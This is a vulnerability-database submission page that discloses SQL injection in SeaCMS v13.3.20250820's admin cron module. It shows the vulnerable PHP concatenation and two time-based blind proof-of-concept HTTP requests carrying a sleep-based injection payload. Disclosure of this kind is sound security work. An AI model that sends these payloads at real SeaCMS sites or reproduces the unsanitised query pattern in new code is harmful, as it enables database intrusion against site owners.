Soumettre #659883: SeaCMS v13.3.20250820 SQL Injectioninformation

Titre	SeaCMS v13.3.20250820 SQL Injection
Description	# Summary SeaCMS v13.3.20250820 contains multiple SQL injection vulnerabilities in the admin panel's cron task management module (admin_cron.php). # Details ## Root Causes Direct SQL Concatenation: User input is directly embedded in SQL queries without parameterization. Insufficient Sanitization: dhtmlspecialchars() only escapes HTML, not SQL. Multiple Injection Points: Different parameters in the same endpoint are vulnerable. Injection Point 1 (resourcefrom) ``` // In PlanMode=0 block: $rfromarr = explode('#', $_POST['resourcefrom']); // Unsanitized $rid = $rfromarr[0]; $url = $rfromarr[1]; $dsql->ExecuteNoneQuery("INSERT ... VALUES('$rid', '$url')"); // Direct concatenation ``` Injection Point 2 (collectID) ``` // In PlanMode=4 block: $filename = "autocollectnews.php#".$_POST['collectID']."#..."; $dsql->ExecuteNoneQuery("INSERT ... VALUES('$filename')"); // No sanitization ``` # POC ## PoC #1: Time-Based Blind via resourcefrom ``` POST /[admins'URL]/admin_cron.php?action=addCron HTTP/1.1 Host: 127.0.01 Content-Type: application/x-www-form-urlencoded Cookie: [Admin Cookie] PlanMode=0&resourcefrom=00'XOR(0if(now()=sysdate(),sleep(4),0))XOR'Z&...[other params] ``` Effect: Causes a 4-second delay if now()=sysdate() is true. ## PoC #2: Time-Based Blind via collectID (Multipart) ``` POST /[admins'URL]/admin_cron.php?action=addCron HTTP/1.1 Host: 127.0.0.1 Content-Type: multipart/form-data; boundary=----boundary ----boundary Content-Disposition: form-data; name="collectID" 00'XOR(0if(now()=sysdate(),sleep(4),0))XOR'Z ----boundary-- ```
La source	⚠️ https://github.com/Hebing123/cve/issues/93
Utilisateur	jiashenghe (UID 39445)
Soumission	22/09/2025 12:22 (il y a 7 mois)
Modérer	26/09/2025 14:44 (4 days later)
Statut	Accepté
Entrée VulDB	326112 [SeaCMS 13.3.20250820 Cron Task Management /admin_cron.php resourcefrom/collectID injection SQL]
Points	20

◂ Précédent Aperçu Suivant ▸

Want to stay up to date on a daily basis?

Enable the mail alert feature now!